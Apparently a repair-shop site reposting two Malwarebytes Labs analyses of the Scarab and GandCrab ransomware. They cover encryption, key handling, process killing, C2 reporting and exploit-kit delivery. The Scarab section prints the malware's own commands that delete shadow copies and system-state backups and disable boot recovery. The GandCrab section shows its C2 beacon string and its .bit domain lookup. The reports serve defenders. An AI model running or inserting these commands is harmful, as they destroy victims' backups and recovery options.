mshta.exe “javascript:o=new ActiveXObject(‘WScript.Shell’);

Next, it proceeds to delete shadow volume copies, which is standard for ransomware to make sure users cannot restore encrypted files.

—–Executes these scripts with mtsha.exe:—–
o.Run(“cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0”,0);
o.Run(“cmd.exe /c wmic SHADOWCOPY DELETE”,0);
o.Run(“cmd.exe /c vssadmin Delete Shadows /All /Quiet”,0);
o.Run(“cmd.exe /c bcdedit “
new ActiveXObject(“WScript.Shell”);
o.Run(“cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP-keepVersions:0”,0);
o.Run(“cmd.exe /cwmicSHADOWCOPYDELETE”0);
o.Run(“cmd.exevssadminDeleteShadows /All/Quiet”,0);
o.Run(“cmd.exe /c bcdedit /set {default} recoveryenabled No”,0);
o.Run(“cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures”,0);

It then opens a thread that loops forever and makes sure no “key” processes are running. If any are found, it kills those processes. The reason for this is possibly that these processes have a lock on some files that the ransomware would have otherwise wanted to encrypt. So by killing these processes, it frees the files for encryption. The key processes are from a string generated:


In the main loop of the encryption function, it performs constant checks throughout the code for a mutex, and if it exists, this is a sign to clean itself up and remove itself from the system:


The encryption loop can be called through many different sections in the code, but the section that runs initially and performs the majority of the encryptions is pictured below:

Recursively goes through all folders and checks to make sure the extension is not .exe or .dll. If okay, it encrypts files and renames them with a .scarab extension.

[checking current file extension using POS(),  if exists as substr of “exe,dll”]

The encryption code does not directly use any crypto APIs. Instead, the AES code is embedded within the malware, as shown in the images above.

[section is the setup leading to the call to the main cryptor function]

Encryption algorithym

We have determined that the algorithm for encryption is AES. A 4-byte chunk (0xDEFACE01) is tacked onto the buffer before the actual file data that it reads. This could be salt, or a joke from the malware author. It performs some data manipulation operations using generated bytes, which could likely be the initialization vector to create randomness.


The malware proceeds to run AES 256 on the data, via the AES_ALGO labeled function. We determined it’s AES 256 because of a few properties.

  1. It uses 16-character blocks. This is pretty standard for any type of AES. It encrypts 16 characters from the file at a time, which is 128 bits.
  2. What differentiates the versions of AES is the size of the keys and the number of encryption rounds. In this case, it uses 14 rounds, which is standard for AES 256, instead of 10, which is standard for AES 128.  The key size is also 256 bits (32 bytes or characters).
  3. The sub type CBC (cipher block chaining) is also being used. The main indicator for CBC here is that the previous cipher text is used to encrypt the next plain text block. In other words, the previous encrypted block is used as the initialization vector for the next block of data to encrypt.
[showing the flow for AES CBC, IV being used first, followed by previous cipher text being used as IV]

In this case, the IV bytes are being XORed against the plain text bytes as an initialization step to create more randomness in the results. As you can see from the next image, the output of AES is then copied into the variable that will be used at the beginning of the loop to initialize the next plain text block before performing AES on it. At this point, it should be clearly AES usage, despite not being called via crypto APIs.

[The image below shows where the previous cipher-text is used for initialization as the IV. NOTE: var_28 will contain the encrypted data]

Below are a few screenshots illustrating the algorithm. As you can see, the data is loaded into matrixes. Then, a series of data operations is performed against some hardcoded data, together with the encryption key bytes. What you are seeing below in the highlighted text is one set of operations (1 of 4) in a single round. Four of these sets make up one encryption round. This is because in order to perform the matrix mathematics, you need to perform the operation for each item in the matrix against each of the others. And as stated earlier, 14 rounds total are done.

The encoded encryption key is written in the registry ‘temp’ key:

If the key is found in the registry, it proceeds to the function that decodes the key from the registry into the raw encryption key. Otherwise, it jumps to new generate function.

This is interesting because it is the main key used to encrypt files. The format is similar to the key from the ransom note, but this one is longer, suggesting that the key given to the user as the ID is an encoded version of the key stored in the registry. Example of the dumped key:


Versus the key from the ransom note:


The key used to encrypt changes from file to file. Meaning that two files with identical content will be different after encryption. Essentially what happens is that there is a initial key and many sub keys are derived from that key. If just a single encryption key was used for all of the files (which has been seen with other ransomware), you would be able to capture memory at any point in the encryption process, save the key, and use it to decrypt all of the files on your hard drive. Unfortunately, because of this key cycling that Scarab performs, it makes decryption of the files likely impossible.

After full disk encryption is complete, the ransomware proceeds to a call function that enumerates all network folders and drives. For example: VMWare shared folders, Terminal services, Network Drives. If any are found, it encrypts the files within those folder as well.

Once complete, it opens the encryption message via notepad.exe.


There have been a number of articles we’ve come across online that state that Scarabey has the ability to act as a backdoor, allowing remote access, and also may gather sensitive data. From our analysis, we believe this to be untrue. We found no signs of any other functionality aside from simply encrypting files on user’s computer.

Additionally, there were rumors of Scarab being built off of the open source ransomware project on gitHub called HiddenTear. We have confirmed this to be untrue in both our own research and with external researchers. It seems to be an industry consensus now that it was mistakenly posted.

Malwarebytes for Windows detects this threat and its variant as: Ransom.Scarab.

The post Scarab ransomware: new variant changes tactics appeared first on Malwarebytes Labs.

Powered by WPeMatico

Jan 30, 2018
Comments Off on GandCrab ransomware distributed by RIG and GrandSoft exploit kits

GandCrab ransomware distributed by RIG and GrandSoft exploit kits

This post was authored by Vasilios Hioueras and Jérôme Segura

Late last week saw the appearance of a new ransomware called GandCrab. Surprisingly, it is distributed via two exploit kits: RIG EK and GrandSoft EK.

Why is this surprising? Other than Magnitude EK, which is known to consistently push the Magniber ransomware, other exploit kits have this year mostly dropped other payloads, such as Ramnit or SmokeLoader, typically followed by RATs and coin miners.

Despite a bit of a slowdown in ransomware growth towards the last quarter of 2017, it remains a tried and tested business that guarantees threat actors a substantial source of revenue.


GandCrab was first spotted on Jan 26 and later identified in exploit kit campaigns.

RIG exploit kit

The well-documented Seamless gate appears to have diversified itself as of late with distinct threads pushing a specific payload. While Seamless is notorious for having switched to International Domain Names (IDNs) containing characters from the Russian alphabet, we have also discovered a standard domain name in a different malvertising chain. (Side note: that same chain is also used to redirect to the Magnitude exploit kit.)

We observed the same filtering done upstream, which will filter out known IPs, while the gav[0-9].php step is a more surefire way to get the redirection to RIG EK.

At the moment, only the gav4.php flow is used to spread this ransomware.

GrandSoft exploit kit

This exploit kit is an oldie, far less common, and thought to have disappeared. Yet it was discovered that it too was used to redistribute GandCrab.

GrandSoft EK’s landing page is not obfuscated and appears to be using similar functions found in other exploit kits.

Ransom note

Interestingly, GandCrab is not demanding payment in the popular Bitcoin currency, but rather a lesser-known cryptocurrency called Dash. this is another sign that threat actors are going for currencies that offer more anonymity and may have lower transaction fees than BTC.

Technical analysis

After unpacking, the binary is pretty straight forward as far as analysis is concerned. There were no attempts to obfuscate data or code beyond just the first layer of the packer. Everything from the exclusion file types to web request variables, URLs, list of AVs—even the whole ransom message—is in plain text within the data section. On initial look-through, you can deduce what some of the functionality might be just by simply looking at the strings of the binary.

The code flow stays relatively inline, so as far as reverse engineering is concerned, it allows you to quite accurately analyze it even just statically in a disassembler. The code is divided up into three main segments: initialization, network, and encryption.


After unpacking, GranCrab starts out with a few functions whose tasks are to set up some information to be used later in the code. It queries information about the user such as:

  • username
  • keyboard type
  • computer name
  • presence of antivirus
  • processor type
  • IP
  • OS version
  • disk space
  • system language
  • active drives
  • locale
  • current Windows version
  • processor architecture

It specifically checks if the keyboard layout is Russian, writes out an integer representation for that result, and builds a string with all this info. Below is the code that is starting to write out the variable names to label the information gathered:

It then cycles through all letters of the alphabet querying if a drive exists and what type it is. If it is a CDRom, unknown, or non existent, it skips it. If a fixed drive is found, it copies its name to a buffer and copies a string describing what type of drive it is. For example, the C: drive is FIXED.

It then gets disk free space and information on sectors that it converts into another series of numbers via printf function tokens: C:FIXED_64317550592. It continues this for every drive and builds a list.

It puts all of the information gathered on the system together and you can assume, before you even get to this point in the code, that this will be sent up to a C2 server at some point, as it is in the format of a GET request. Here is an example of how the system info gets structured below:


It also searches running processes, checking against a finite set of antivirus programs that will also be converted to the info string for the C2 server.

It then proceeds to create a mutex with some system info along with a generated ID. For example:


In order to initialize itself for the future encryption, it cycles through a hardcoded list of processes to kill. This is a common technique among ransomware that attempts to kill processes that might have a lock on certain files, which it would like to encrypt.

msftesql.exe                        sqlagent.exe                           sqlbrowser.exe
sqlservr.exe                         sqlwriter.exe                         oracle.exe
ocssd.exe                             dbsnmp.exe                            synctime.exe
mydesktopqos.exe           agntsvc.exe                             isqlplussvc.exe
xfssvccon.exe                     mydesktopservice.exe       ocautoupds.exe
agntsvc.exe                         agntsvc.exe                             agntsvc.exe
encsvc.exe                          firefoxconfig.exe                  tbirdconfig.exe
ocomm.exe                        mysqld.exe                              mysqld-nt.exe
mysqld-opt.exe                 dbeng50.exe                          sqbcoreservice.exe
excel.exe                              infopath.exe                           msaccess.exe
mspub.exe                          onenote.exe                            outlook.exe
powerpnt.exe                    steam.exe                                 thebat.exe
thebat64.exe                      thunderbird.exe                    visio.exe
winword.exe                       wordpad.exe

Next, it calls the built-in crypto functions to generate keys. GandCrab generates the public and private keys on the client side and uses the standard Microsoft crypto libraries available using API calls from Advapi32.dll. It calls CryptGenKey with the RSA algorithm.

Network connection

Now it enters the main loop for the Internet functionality portion of the ransomware. This area of code either succeeds and continues to the encryption section of code, or it loops again and again attempting to succeed. If it never succeeds, it will never encrypt any file.

This section starts off by making a GET request to ipv4bot.whatismyipaddress.com that saves the IP address returned and adds to the GET request string, which has been built with the system information.

It continues and takes a binary chunk, which is the RSA public key that was stored earlier in the initialization. That key is converted to base64 via the CryptBinaryToStringA API with the following parameters:


It will be tacked on the the existent GET string, which it has been building this whole time. Below is an example of the RSA key generated in binary and its conversion, followed by the finalized GET string with the base64 of the keys in it:

This is an example of an RSA public key generated with the crypto APIs:
A7 EC BD E2 49 43 E1 11 DA 12 10 E0 25 59 AA 83 77 35 FC 3E 49 C8 3B 6C 3D 91 CF FF 96 6E D8 45 FE 8A 58 20 E6 CB 91 AB 99 6A E2 04 EC 58 66 95 05 8C 2F 7E C6 19 6D 24 B5 5F C4 9A 01 3D 3B FB 31 4E AC 25 07 8C 0E 6C 57 4C C0 23 24 3A EB 57 97 17 79 F8 62 73 6B AD B2 09 60 BB B7 9A CF F9 5B 68 B8 C1 44 07 F5 5E 3E 06 FE C2 35 CF 99 82 29 28 37 1B E6 51 29 6C 0B 87 89 F9 90 26 F7 CC DA 75 C4 46 A1 E3 30 09 C0 6A CB 5E CB 87 8E 40 EF 4C 7E 02 AE E8 06 6A D7 24 FC 0E 40 EA 69 CD 6D 8D 24 92 6E 53 2F D2 69 D2 A2 F3 97 54 63 EB D9 C7 BD 9E 41 19 91 F1 6B D6 CA AD 9E 0E D3 0B A0 53 50 84 87 6D 49 4C 49 D2 3B 8E 80 F7 7F 35 F1 D7 A7 81 0F 90 04 40 AC 4B 7C ED 37 71 8A B1 FA 84 33 33 FB 62 EE 04 A3 C7 9A 47 2C 64 64 95 3D 34 A5 CC 12 6E E4 81 40 E6 7F 03 02 C4 57 D6

Which gets converted to:


And builds the GET string to send to the C2 with all the system information from earlier, and also the encryption keys:

action=call&ip= 7 Enterprise&os_bit=x64&ransom_id=c9ed65de824663fc&hdd=C:FIXED_64317550592/50065174528&pub_key=BgIAAACkAABSU0ExAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfW
[Crypto key base 64 functions]
[Section of code that is adding the encoded keys to the get string under priv_key parameter]

At this point, it is clear that the malware will be sending this info to the C2 server. This is interesting because it may be possible to pull the keys from memory and use them for the decryption of files. We will continue to investigate this and update the article if any discoveries are found.

GandCrab’s server is hosted on a .bit domain, and therefore it has to query a name server that supports this TLD. It does this by querying for the addresses of the following domains using the command:

nslookup [insert domain]  a.dnspod.com.

This command queries the a.dnspod.com name server, which support the .bit TLD for one of the domains below.


The NSlookup child process is opened through a pipe that was created. This is done so that a child process can directly affect the memory in the parent process, rather than transferring outputs manually back and forth. It is an interesting and useful technique. You can look at the following section of code for more details:

The ransomware now attempts to send data to the server, and if an error occurs or the server was not reachable, it continues this whole process in an infinite loop until it finds one that works, re-querying for client IP and running nslookup again and again with different IP outputs. Unless it connects with the server, it will run until it is closed manually.

As mentioned before, it will not continue to the encryption routine until it finds a server, which means it will enter in an infinite loop of IP requests:

Once it finds one of these, it continues to open a thread that will start the main encryption functionality. However, before it begins, it opens another thread that creates a window and labels itself as Firefox.The window is loaded with code that will copy itself to the temp directory and set itself up in the registry. This is actually one of the few parts of the malware that is not taken directly from plain text. The file name copy of itself is a random series of letters generated by calling the cryptGenRandom function, and using its output on an array of letters.

The strange part about this function is not what it does, because it is creating persistence that we had been waiting for, but rather why a window was created in the first place. As far as we could understand, there is no benefit of launching a window to perform these tasks. Maybe it was experiment on the part of the author, but the intent remains unclear.

Encryption routine

As we have established from the initialization section of the malware, the encryption algorithm used is RSA. Before we get the encryption section, the code makes sure that it is not encrypting specific types of files that it considers protected. The files are the following, hard coded into the malware:


If it finds that the file name is on that list, it will skip it and continue to the next. It also skips looking into a folder if it is one of these key folders:

local app data
program data

When it passes these checks and gets to a specific file, it runs one final check on the extension against a list of acceptable file extensions to be encrypted:

If all checks pass, it proceeds to use the previously generated keys along with some salt and random number generated to encrypt the file and rename it with a .GDCB extension. The main encryption loop is a recursive function that will eventually make it to every file on the drive.


Malwarebytes users are protected at the delivery chain (exploit protection), but we also proactively stopped this ransomware before having seen it, thanks to our anti-ransomware engine:


It is interesting to see a new ransomware being distributed via exploit kits in what so far seems to be a few ongoing campaigns. The other interesting aspect is that two distinct exploit kits are delivering it, although it is unclear if the same actor is behind both campaigns and experimenting with different distribution channels.

Indicators of Compromise

Seamless gate,xn--80abmi5aecft.xn--p1acf

GrandSoft EK (IP)

GandCrab (packed)


GandCrab (unpacked)


The post GandCrab ransomware distributed by RIG and GrandSoft exploit kits appeared first on Malwarebytes Labs.

Powered by WPeMatico


Location and hours

Txt/Email or CALL NOW to discuss your recovery plan.
Computer repair association logo